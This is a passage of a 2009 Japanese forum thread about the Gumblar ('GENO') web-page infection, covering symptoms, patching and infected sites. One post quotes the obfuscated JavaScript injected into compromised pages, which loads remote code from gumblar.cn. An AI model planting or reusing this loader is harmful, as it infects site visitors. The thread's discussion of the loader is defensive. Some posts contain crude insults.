09/05/16 03:07:33
感染=OSの再インスコ確定がだるい
793:名無しさん@お腹いっぱい。
09/05/16 03:07:34
>>784
同人は専用スレがたってるから
気づいてる人が多いだけだよ
794:名無しさん@お腹いっぱい。
09/05/16 03:07:53
同人見てるキモヲタなんて感染して痛い目見たほうが良いんじゃね?
795:名無しさん@お腹いっぱい。
09/05/16 03:08:04
>>777
769だけど、commandで黒い窓出た出てきた!ありがとう!
まだかかってないってことだな、これからも気をつける!
796:名無しさん@お腹いっぱい。
09/05/16 03:08:39
>>790
もう危険が危ないのが良く分かった
797:名無しさん@お腹いっぱい。
09/05/16 03:08:49
ごめんなさい
798:名無しさん@お腹いっぱい。
09/05/16 03:09:00
>>786
PC初心者
URLリンク(pc11.2ch.net)
799:名無しさん@お腹いっぱい。
09/05/16 03:09:10
というか身内でサイトいきかうだろ
濃い範囲で展開されてるんだと思う
んでIE使用者も多そう
800:名無しさん@お腹いっぱい。
09/05/16 03:09:18
つい一時間前までは神戸のインフルにびびってたのに今はこっちのが遥かに怖い
801:名無しさん@お腹いっぱい。
09/05/16 03:09:31
>>788
他は気付いてないだけで広がりまくってそう(((゚Д゚;)))ガクガクブルブル
802:名無しさん@お腹いっぱい。
09/05/16 03:09:36
>>778
じゃあアンインストールでいいな。
pdfなんぞ見れんでも困らんし。
803:名無しさん@お腹いっぱい。
09/05/16 03:09:48
NTTはやべえだろ…ええー感染してんだ
804:名無しさん@お腹いっぱい。
09/05/16 03:10:24
え、NTT感染してんのかよ
805:名無しさん@お腹いっぱい。
09/05/16 03:10:29
>>791
>全員サイト持ち
ないないないn
806:名無しさん@お腹いっぱい。
09/05/16 03:10:35
普通のサイト開いたら「JS:Redirector-G [Trj]」だって警告でた
4月の半ばだった希ガス
これってGENOかな
807:名無しさん@お腹いっぱい。
09/05/16 03:10:57
NTTじゃねーだろ
808:名無しさん@お腹いっぱい。
09/05/16 03:10:59
>>795
ファイル名変えたら実行できたって報告があったから
それはあんまり意味がないかもしれない
Meを使ってる時点で終わってる
809:名無しさん@お腹いっぱい。
09/05/16 03:11:21
>>798
活用するけどさ、聞きまくるわけにもいかないだろ
初心者は本当に基本的なことでもわからないけど、それを教えてる方はしんどいだろ
810:名無しさん@お腹いっぱい。
09/05/16 03:11:41
>>806
当たりです
三月下旬以降から拡大中だよ
811:名無しさん@お腹いっぱい。
09/05/16 03:12:01
さすがに人が入れ替わってきたかな
まとめwiki置いといたほうがよさそうだな
GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
812:名無しさん@お腹いっぱい。
09/05/16 03:12:08
>>803
>>804
>>142
813:名無しさん@お腹いっぱい。
09/05/16 03:12:44
>>810
3月下旬発症てとこまで豚と一緒じゃないのよ
こわっ
814:名無しさん@お腹いっぱい。
09/05/16 03:13:30
>>732 なるほど
恐らくこれだな
スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト
スクリプト関係には詳しくないからわからないが
素人目でもこれはくさいな
815:名無しさん@お腹いっぱい。
09/05/16 03:13:44
>>810
まじか。avastが開く前に止めてくれたから助かった
「homepage3.nifty~(伏せとく)」の個人サイトだった
816:名無しさん@お腹いっぱい。
09/05/16 03:13:52
>>806 ぐぐったらこんなんでました URLリンク(detail.chiebukuro.yahoo.co.jp)
817:名無しさん@お腹いっぱい。
09/05/16 03:14:15
眠れねえ・・・
818:名無しさん@お腹いっぱい。
09/05/16 03:14:47
GENOはトロイとして検出されるの?
819:名無しさん@お腹いっぱい。
09/05/16 03:14:48
眠気が覚めたよもう
820:名無しさん@お腹いっぱい。
09/05/16 03:15:10
知恵袋でさえ怖くなってきたおいらチキンすぎる
821:名無しさん@お腹いっぱい。
09/05/16 03:15:24
もう無理だよ。最終的にネットやってる奴は6割感染するな。
822:名無しさん@お腹いっぱい。
09/05/16 03:15:44
怖くて2ちゃん以外開けない
823:名無しさん@お腹いっぱい。
09/05/16 03:15:54
本っ当にここで聞きづらい初心者は
同人板のスレを最初から見たほうが判りやすいと思う
まだ読みもせず質問するのがいるから、拡張子の表示から説明してるレスもある
824:名無しさん@お腹いっぱい。
09/05/16 03:15:55
こんだけ広まってるなら
落ち着くのは何時になるのやら…
825:名無しさん@お腹いっぱい。
09/05/16 03:15:58
そのまま貼り付けたらログから検出反応出るがな(´・ω・`)
826:名無しさん@お腹いっぱい。
09/05/16 03:16:15
>>816
JavaとJavaScriptを本気で混同してらっしゃる人がベストアンサーとな・・・?
827:名無しさん@お腹いっぱい。
09/05/16 03:16:56
rss readerでブログ読んでても、
対象サイトが感染していると伝染する?
828:名無しさん@お腹いっぱい。
09/05/16 03:17:29
同人から来た奴はスルーしろ。こいつらは感染したって自業自得だろ。
829:名無しさん@お腹いっぱい。
09/05/16 03:17:30
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
830:名無しさん@お腹いっぱい。
09/05/16 03:18:06
同人板のスレ眺めてきた
あれ初心者板より優しいんじゃないのかw
831:名無しさん@お腹いっぱい。
09/05/16 03:18:14
首相がオタクのこんな国じゃ
832:名無しさん@お腹いっぱい。
09/05/16 03:18:18
今頃になって慌ててこのスレ読んでる奴は手遅れ
833:名無しさん@お腹いっぱい。
09/05/16 03:18:39
とりあえず全部最新版にしたー!
834:名無しさん@お腹いっぱい。
09/05/16 03:18:57
>>830
ここより親切だなww
835:名無しさん@お腹いっぱい。
09/05/16 03:19:01
>>827
それ俺も気になった
836:名無しさん@お腹いっぱい。
09/05/16 03:20:16
これだけ広がりやすいウイルスで感染してるかもしれない奴を放置とか危なすぎるだろ
837:名無しさん@お腹いっぱい。
09/05/16 03:20:17
感染してるサイトまとめろよ
838:名無しさん@お腹いっぱい。
09/05/16 03:20:18
同人板小学生が多いイメージになった
839:名無しさん@お腹いっぱい。
09/05/16 03:20:23
>>823
決め付けるなって、調べない初心者もいるけど
840:357
09/05/16 03:20:55
>>785
めっちゃ沢山感染しているし、発表して謝罪しているサイトはまだマシ。
俺はとっくに知人には連絡して当分ネットはするなって言っておいた。
ME使ってるやつなんて、とっくに何かのウィルスに感染していると考えた方がいい。
cmd起動とか関係ないレベルだから。
>>809
しんどいのは、初心者が既出の情報にも目を通さない愚かものばかりだからさ。
一度の教えで済むならいいが、実際はわらわらと、すき放題に群がるだろ。
841:名無しさん@お腹いっぱい。
09/05/16 03:20:59
>>780もありがとう
一応kerioも入れてIEOEも使わずにやってきたけど、
Meはそんなに終わってるのか?
842:名無しさん@お腹いっぱい。
09/05/16 03:21:24
やっぱIDでる板はいいなぁーん
843:名無しさん@お腹いっぱい。
09/05/16 03:21:28
>>838
ガキっつうか無知と女が多いから
無知に女が優しく教ちゃうんだろ
844:名無しさん@お腹いっぱい。
09/05/16 03:21:32
感染してるのって・・・
>>523
>>763
この他にもあるの?
845:名無しさん@お腹いっぱい。
09/05/16 03:21:40
>>827
ブログはスクリプトをうめこめないんじゃね
個人サイトの適当生成RSSなら生成方法によるかも
確実に安全とはいいきれないとおもう
846:名無しさん@お腹いっぱい。
09/05/16 03:22:12
ブログとかmixiとかやってる人はウイルスのことちょっと書いといてもいいかもね
知らない人のほうがまだまだ多いだろうし
847:名無しさん@お腹いっぱい。
09/05/16 03:23:01
Meを極限まで安定化させるスレ・Me総合スレ Part 16
スレリンク(win板)l50
に行くと幸せになれるかもしれない
848:名無しさん@お腹いっぱい。
09/05/16 03:23:15
連絡先が書いてないサイトはどうしたらいい?
もう直ってたから連絡する必要はないんだろうけど
849:名無しさん@お腹いっぱい。
09/05/16 03:23:36
初心者なんかスルーしろよ。感染の確認方法すらまともに実行できねぇ上に、同じ質問何度も何度も・・・。
さっさとクリーンインストールしろっての
850:名無しさん@お腹いっぱい。
09/05/16 03:23:42
多分同人のやつらはまだましだよ
一般人の方がさらに知識ないし危機感ないから
851:名無しさん@お腹いっぱい。
09/05/16 03:23:50
>>838
放っておくと自分も被害受けるから
852:名無しさん@お腹いっぱい。
09/05/16 03:24:01
オタクになるのって思春期の中高生がたしかに多そうだな
そりゃこわい
853:名無しさん@お腹いっぱい。
09/05/16 03:24:20
>>847
サンキュ、見て勉強してくる
854:名無しさん@お腹いっぱい。
09/05/16 03:24:42
同人板に行けばこんな俺でも女に優しくして貰えるんですね!
しかもタダで!
855:名無しさん@お腹いっぱい。
09/05/16 03:25:22
>>853
どっちみちMeはMSがサポートを打ち切ってるから
脆弱性があってもほったらかしになってるんだよ
だからすごくあぶないの
サポート打ち切られてるからセキュリティ製品もサポートしてないの
856:名無しさん@お腹いっぱい。
09/05/16 03:25:36
>>845
fc2ブログとか余裕でScript埋め込めるよ
自分でだけど
857:名無しさん@お腹いっぱい。
09/05/16 03:25:42
URLリンク(www.mse.co.jp)
ここで連絡先調べてプギャーする
858:名無しさん@お腹いっぱい。
09/05/16 03:25:44
>>854
ほどほどにな
859:名無しさん@お腹いっぱい。
09/05/16 03:26:16
>>854
おまえの先輩の成れの果て
スレリンク(doujin板)
860:名無しさん@お腹いっぱい。
09/05/16 03:26:17
これ最終的に何で対応すんだろ
861:名無しさん@お腹いっぱい。
09/05/16 03:26:43
>>854
お前が21歳以上なら801板に池。
「vipから来ました」という魔法の呪文を唱えると
お姉さまがとってもやさしくしてくれるぞ。
862:名無しさん@お腹いっぱい。
09/05/16 03:26:55
>>854
調べてもわからないこと聞けよ
863:名無しさん@お腹いっぱい。
09/05/16 03:27:10
>>844
前スレの>>432のが感染者数だとするとこんだけ
432 名無しさん@お腹いっぱい。 sage 2009/05/14(木) 14:25:33
google.com/safebrowsing/diagnostic?site=94.247.2.195
2009/04/09(木) 7560 個
2009/04/17(金) 8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/28(火) 13612 個
2009/05/03(日) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。
google.com/safebrowsing/diagnostic?site=gumblar.cn
2009/05/03(日) 623 個
2009/05/06(水) 1108 個
2009/05/07(木) 1951 個
2009/05/08(金) 1437 個
2009/05/09(土) 648 個
2009/05/14(木) 24 個のドメインを感染させています。
864:名無しさん@お腹いっぱい。
09/05/16 03:27:20
>>856
埋め込まれてRSSにそのまま配信されたら詰むな
865:名無しさん@お腹いっぱい。
09/05/16 03:27:38
オタクって男のほうが多いんじゃないの?
どうでもいいけど
866:名無しさん@お腹いっぱい。
09/05/16 03:27:52
>>864
わああああ
867:名無しさん@お腹いっぱい。
09/05/16 03:28:22
同人板とおたく板は一緒じゃねえのか
868:名無しさん@お腹いっぱい。
09/05/16 03:28:39
>>863
こりゃあ、エロサイト漁ってるガキはあっという間に感染して終了だな
869:名無しさん@お腹いっぱい。
09/05/16 03:29:22
ブログはキーロガー埋め込めるからそっちでも危ない
870:名無しさん@お腹いっぱい。
09/05/16 03:29:43
/(^o^)\
871:名無しさん@お腹いっぱい。
09/05/16 03:30:23
>>865
書き手は女の方が多い
872:名無しさん@お腹いっぱい。
09/05/16 03:30:39
>>863
なんという感染力…
873:名無しさん@お腹いっぱい。
09/05/16 03:31:17
>>869
中国韓国台湾のブログは最近ひどいことになってるね
各MMORPGでアカウントハック祭り
genoとは関係ないけど
874:名無しさん@お腹いっぱい。
09/05/16 03:31:20
>>815
それって上に書いてある奴じゃね
875:名無しさん@お腹いっぱい。
09/05/16 03:31:24
感染してないけど、今ftp立ち上げるの怖いから自鯖設置の
ブログだけ更新しようと思ってたけどそれもやばいのかな
876:名無しさん@お腹いっぱい。
09/05/16 03:32:33
踏むとふつーにマルウェア感染するっていう認識>*.cn
877:名無しさん@お腹いっぱい。
09/05/16 03:32:49
>>512
国交省の地方整備局が1度やられてるんだがなあ
URLリンク(www.cbr.mlit.go.jp)
ほんとあまりニュースにならないね
それこそmixiとかようつべとかネットバンクとかが改竄されないと危機感持たんのかorz
878:名無しさん@お腹いっぱい。
09/05/16 03:33:10
何もしないで素直に専ブラで2chだけ見てるのが一番だな
879:名無しさん@お腹いっぱい。
09/05/16 03:33:47
>>875
clientとserverでは別物のウイルスだと思うよ
serverはftpハック
clientはハックserverのjs、つまりGENOウイルス
880:名無しさん@お腹いっぱい。
09/05/16 03:34:07
>>877
マスゴミなんてそんなもん
被害が拡大してやっとぼちぼち取り上げ始める
881:名無しさん@お腹いっぱい。
09/05/16 03:34:23
>>863
難読化されたコードが埋め込まれているサイトはカウントされていないよね?
882:名無しさん@お腹いっぱい。
09/05/16 03:34:24
>>77のこれ何?
883:名無しさん@お腹いっぱい。
09/05/16 03:35:20
フラッシュープレーやーは何もしなくておk?
884:名無しさん@お腹いっぱい。
09/05/16 03:35:28
なんだよお前ら
うちの職場普通にME使いだぞ
まいったか
885:名無しさん@お腹いっぱい。
09/05/16 03:35:42
>>883
ログ全部読め
886:名無しさん@お腹いっぱい。
09/05/16 03:36:18
>>883
最新にしろ
887:名無しさん@お腹いっぱい。
09/05/16 03:36:21
>>882
ブロックすべきアドレスのリスト
888:名無しさん@お腹いっぱい。
09/05/16 03:37:04
>>882
PeerGuardian2用ブロックリスト
889:名無しさん@お腹いっぱい。
09/05/16 03:37:18
まあ人命に関わる豚インフルと仮想空間じゃ比べるとねえ
クレカの番号抜かれたら死ねるけど
890:名無しさん@お腹いっぱい。
09/05/16 03:37:31
>>731
Vistaだと、変なところ(\Windows\help\imu\のサブフォルダ内)にsqlsodbc.chmあるよ
891:名無しさん@お腹いっぱい。
09/05/16 03:37:36
>>887
なるほど
ありがとう先輩
892:名無しさん@お腹いっぱい。
09/05/16 03:37:57
>>889
引きこもれば豚インフレは大丈夫
だが、こっちは引きこもってても危険
893:名無しさん@お腹いっぱい。
09/05/16 03:38:07
>>884
genoにやられなくても他のウイルスにやられますがな
894:名無しさん@お腹いっぱい。
09/05/16 03:38:09
>>889
オンラインで使ってたら余裕で抜かれると思うよ
895:名無しさん@お腹いっぱい。
09/05/16 03:38:22
>>888
ありがとう
896:名無しさん@お腹いっぱい。
09/05/16 03:38:49
>>884
踏み台にされてますってそのうち警察がくるかもな
897:名無しさん@お腹いっぱい。
09/05/16 03:39:31
次スレはこのスレを叩き台にしてテンプレある程度纏めないといけないな
898:名無しさん@お腹いっぱい。
09/05/16 03:40:19
インフル怖いなぁ外出もできやしないよ
↓
ネサフでもするかー
アウトー
899:名無しさん@お腹いっぱい。
09/05/16 03:40:46
>>892
ネットしなきゃいいの
900:名無しさん@お腹いっぱい。
09/05/16 03:41:09
>>899
死んでしまうよ
901:名無しさん@お腹いっぱい。
09/05/16 03:42:39
2ちゃんだけしてればいいんだよ
902:357
09/05/16 03:42:40
とりあえず、このスレの
>>1-15
までは読んで実行しないと、お話にならない。
>>4は無視。
以下、感染した、とあるサイトのお詫び文(一部、俺が改変)と対処法(あくまで今のところ、明日になれば通用しないかも)
サイトをブラウザーでご覧いただいた方にウィルス感染の恐れがあることが判明しました。
弊社サイトをご利用いただいている皆様には大変ご迷惑をおかけしましたことをお詫び申し上げます。
現在は、改ざんされたページの修正を完了しており、ご覧いただいてもウィルス感染の恐れはございません。サイトの安全管理には万全を期して参りますので今後ともよろしくお願い申し上げます。
※当該サイトには個人情報は保存されておりませんので流出の恐れはございません。
※Windows Vista以降、Macは、感染の恐れはございません。
感染するシステム
Windows XP以前のOS(XP / 2000など)で、Acrobat Reader、Adobe Readerのバージョンが古い場合
(■俺注:ME以前は論外 古いとは、5/12に最新になった9.1.1よりも前の9.1とかをさす。 reader7も8も5/12以降にアップしていなきゃNG)
903:名無しさん@お腹いっぱい。
09/05/16 03:42:43
>>900
死ねばいいの
904:名無しさん@お腹いっぱい。
09/05/16 03:43:56
もはやバージョンアップのためにネットにつなぐことすら怖い
905:357
09/05/16 03:43:59
続き。
Web ページの表示に使われるhtmlファイルの一部に第三者のサイトより攻撃プログラムをダウンロードするJava Scriptが埋め込まれました。この攻撃プログラムは、Acrobat Reader、Adobe Readerの脆弱性を利用してパソコンの中にスパイプログラムを送り込みます。
Windows XP、2000とAcrobat Reader、Adobe Readerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
(■俺注:5/12より前の古いバージョンを使っていれば、基本的に感染するが、運良く初期設定を変更していてJavaScriptを切っていれば感染しない 切る方法は>>3 だが、既に感染していれば手遅れ 感染していない人も切る事を推奨)
感染した場合、次の様な問題が発生します(以下はあくまで症状の一例。他は>>1)。
・ヘルプファイルの改ざん
C:\Windows\System32のsqlsodbc.chmファイルを改ざんします。(スパイプログラムのデータ置き場に利用されています。)
ファイルサイズが1000バイト程度の場合は、改ざんされています。
・コマンドプロンプトが起動できなくなる
コマンドプロンプトを起動するとエクスプローラーが再起動します。また、この影響でレジストリエディタが起動できなくなります。
続く。
906:名無しさん@お腹いっぱい。
09/05/16 03:44:12
感染していたサイトがなんの謝罪もなく復活してる件について
907:名無しさん@お腹いっぱい。
09/05/16 03:44:44
avastお前だけが頼りだ
908:名無しさん@お腹いっぱい。
09/05/16 03:45:53
2ちゃんしか見てないのにAdobeReaderが勝手に起動した
もうこわいやだもう泣きそう
909:名無しさん@お腹いっぱい。
09/05/16 03:46:08
同人板と協力したらどうだ
910:名無しさん@お腹いっぱい。
09/05/16 03:46:57
>>908
マジで?
911:名無しさん@お腹いっぱい。
09/05/16 03:47:07
>>910
マジ
912:名無しさん@お腹いっぱい。
09/05/16 03:47:23
だからavast入っててもヒューリスティック最大にしなきゃ意味ないって
913:名無しさん@お腹いっぱい。
09/05/16 03:47:26
>>908
単なる自動アップデートとかじゃねぇのか?
914:名無しさん@お腹いっぱい。
09/05/16 03:47:33
>>911
ブラウザ何?
専ブラじゃないだろ
915:名無しさん@お腹いっぱい。
09/05/16 03:47:33
>>908
2ちゃんだけしか見てなくてそれは無い。
916:名無しさん@お腹いっぱい。
09/05/16 03:47:54
>>908
お前IEで見てるだろ
917:名無しさん@お腹いっぱい。
09/05/16 03:48:15
>>914
jane…
918:名無しさん@お腹いっぱい。
09/05/16 03:48:16
すみませーん
股がスルメ臭いです
どうすれば?
919:名無しさん@お腹いっぱい。
09/05/16 03:48:25
>>908
2chからリンクしてるサイトは2chじゃないとこもあるぞ
920:名無しさん@お腹いっぱい。
09/05/16 03:49:45
>>917
じゃあリンク踏んでないか?
専ブラでありえないわー